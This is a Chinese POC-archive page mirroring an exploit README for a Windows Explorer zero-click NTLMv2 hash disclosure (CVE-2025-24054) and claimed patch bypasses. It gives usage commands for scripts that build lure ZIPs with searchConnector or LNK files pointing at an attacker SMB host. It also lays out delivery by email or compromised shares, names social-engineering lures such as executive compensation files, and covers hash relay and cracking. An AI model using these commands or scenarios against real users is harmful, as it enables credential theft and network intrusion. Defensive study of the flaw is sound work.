支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%
立即捐款

POC详情: f7dadd080be0ef8e5fbb5423d9e21112174d6157

来源
https://github.com/Untouchable17/CVE-2025-24054
关联漏洞
标题:Microsoft NTLM 安全漏洞 (CVE-2025-24054)
描述:Microsoft NTLM是美国微软(Microsoft)公司的一个在包括运行Windows操作系统的系统以及独立系统在内的网络上使用的身份验证协议。 Microsoft NTLM存在安全漏洞。攻击者利用该漏洞执行欺骗攻击。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server 2019 (
描述
Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure
介绍
# Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure

### 🎥 Demonstration POC + March 2025 Patch bypass

[![NTLMv2 Hash Disclosure Demo](https://img.youtube.com/vi/_NJ3jqU-wdk/0.jpg)](https://www.youtube.com/watch?v=_NJ3jqU-wdk)
<div>
    
### 🎥 patch bypass

[![NTLMv2 Hash Disclosure Demo](https://img.youtube.com/vi/Btib3LBvpq8/0.jpg)](https://www.youtube.com/watch?v=Btib3LBvpq8)
</div>

> *Click the image above to watch the vulnerability demonstration*

<h2>📋 Technical Overview</h2> 
This repository provides a comprehensive research framework analyzing the vulnerability chain in Windows Shell file format processing that leads to NTLMv2-SSP credential disclosure. The toolkit implements two distinct attack vectors that exploit automatic UNC path resolution during file preview operations in Windows Explorer.

### Core Vulnerability Mechanism

The fundamental security issue resides in Windows Shell's automatic processing of embedded UNC paths within specific file formats during preview operations. When users open ZIP archives containing specially crafted files, Windows Explorer automatically resolves UNC paths without user consent, initiating SMB authentication attempts and exposing NTLMv2-SSP hashes to attacker-controlled servers.

### Attack Surface Components

- **File Format Parsing**: Windows Shell automatic processing of XML-based shell files and LNK shortcut properties
- **ZIP Container Bypass**: Archive preview functionality that circumvents Mark-of-the-Web (MOTW) protections
- **Authentication Trigger**: Automatic UNC resolution during metadata extraction and icon fetching operations

## 🏗️ Architecture Evolution

### 🔰 Phase 1: SearchConnector-based Disclosure (CVE-2025-24054)

**File:** `ntlm-disclosure-poc.py`

This initial implementation exploits Windows Search Connector (.searchConnector-ms) files, which are XML-based configuration files that define search locations for Windows Explorer. The vulnerability triggers when Windows automatically processes the embedded UNC path in the `simpleLocation` element during ZIP archive preview operations.

**Technical Characteristics:**
- XML-based payload structure following Microsoft schema specifications
- UNC path embedding in `searchConnectorDescription` elements
- Automatic processing by Windows Search Indexer and Explorer shell
- Bypasses traditional file execution restrictions

### 🔰 Phase 2: LNK-in-ZIP Bypass (CVE-2025-50154 / CVE-2025-59214)

**File:** `patch_bypass.ps1`

This enhanced technique addresses Microsoft's initial patch by leveraging LNK file properties. The attack exploits Windows Explorer's behavior of fetching icon metadata and resolving target paths during ZIP file preview, while maintaining the zero-click exploitation vector through careful property configuration.

**Technical Characteristics:**
- LNK files with UNC paths in `TargetPath` property
- Local icon references to bypass initial detection mechanisms
- Windows Shell automatic property extraction during preview
- Maintains file format legitimacy while achieving UNC resolution

### 🔧 Prerequisites
<details>
<summary>For Python PoC:</summary>

* Python `3.6+`
* Required packages: `colorama`
</details>

<details>
<summary>For PowerShell PoC:</summary>

* Windows PowerShell `5.1+`
* Execution Policy: `Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser`

</details>
<hr>

### 🔰 Phase 1: Python Implementation (CVE-2025-24054)

```bash
# Basic usage
python ntml-disclosure-poc.py 192.168.1.100

# With custom output file
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip

# Example output
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip

Parameters
target (required): Target IP address or hostname
-o, --output: Custom output filename for ZIP package
```


### 🔰 Phase 2: PowerShell Bypass (CVE-2025-50154/59214)
```
# Basic usage - LNK file auto-removed
.\bypass.ps1 -IP 192.168.1.100

# Keep LNK file for external distribution
.\bypass.ps1 -IP 192.168.1.100 -KeepLnk

# Custom lure name and share
.\bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure FileName" -KeepLnk

# Specify output directory
.\bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk


Parameters
-IP (required): Target SMB server IP address
-Share: SMB share name (default: 'share')
-File: Target filename (default: 'payload.exe')
-Lure: Social engineering filename (default: 'Your_File_For_Payload_Here')
-OutDir: Output directory (default: current directory)
-KeepLnk: Preserve LNK file after ZIP creation
```

<table>
    <thead>
        <tr>
            <th><span>Vector</span></th>
            <th><span>Trigger Mechanism</span></th>
            <th><span>User Interaction</span></th>
            <th><span>Patch Status</span></th>
        </tr>
    </thead>
<tbody>
<tr><td><strong><span>🔗 SearchConnector</span></strong></td>
<td><span>XML parsing + UNC resolution</span></td>
<td><span>ZIP open</span></td><td><span>🛡️ Patched</span></td></tr><tr>
<td><strong><span>📎 LNK TargetPath</span></strong></td>
<td><span>Icon metadata fetch</span></td>
<td><span>ZIP open</span></td
><td><span>🔴 Active</span></td></tr></tbody></table>

  
```mermaid
graph TD
    A[🔴 CVE-2025-24054<br/>Initial Vulnerability] --> B[🛡️ Microsoft Patch]
    B --> C[🟠 CVE-2025-50154<br/>Bypass #1]
    C --> D[🛡️ Microsoft Patch]
    D --> E[🟡 CVE-2025-59214<br/>Bypass #2]
    E --> F[🔴 Current State<br/>Active Exploitation]
    
    style A fill:#ffcccc
    style C fill:#ffddcc
    style E fill:#ffffcc
    style F fill:#ccffcc
```


### 🔧 Technical Specifications
1. 📦 Payload Generation 
   - Create malicious file (SearchConnector/LNK) with UNC path 
   - Package in ZIP archive with enticing name
2. 📤 Delivery 
   - Distribute ZIP via email/web/download
3. 💥 Exploitation
   - Victim opens ZIP in Windows Explorer
   - Automatic file preview triggers UNC resolution
   - NTLMv2-SSP hash transmitted to attacker
4. 🎭 Post-Exploitation
   - Hash capture and relay attacks
   - Password cracking attempts

<hr>

### 💀 Deployment Scenarios
<b>📨 Scenario 1: Direct ZIP Distribution</b>
```
# Create ZIP payload
.\bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"

# Distribution vectors:
# - 📧 Email attachments with social engineering lures
# - ☁️ Compromised file sharing services
# - 🌐 Network share drops in enterprise environments
```
<b>🔄 Scenario 2: LNK File Transfer</b>
```
# Create and preserve LNK file for multi-host deployment
.\bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk

# Cross-host deployment:
copy-item "Project_Documentation.lnk" "\\remote-server\share\"
# Web-based distribution via compromised sites
```
<b>🎯 Scenario 3: Targeted Social Engineering</b>
```
.\bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk
```

<h2 align="center">Contact the Developer</h2>

```
- Group & Contact: t.me/initial_persistence
- Email: tylerblackout17@gmail.com
```
文件快照

 [4.0K]  /data/pocs/f7dadd080be0ef8e5fbb5423d9e21112174d6157
├── [ 12K]  ntml-disclosure-poc.py
├── [4.3K]  patch_bypass.ps1
└── [7.0K]  README.md

1 directory, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。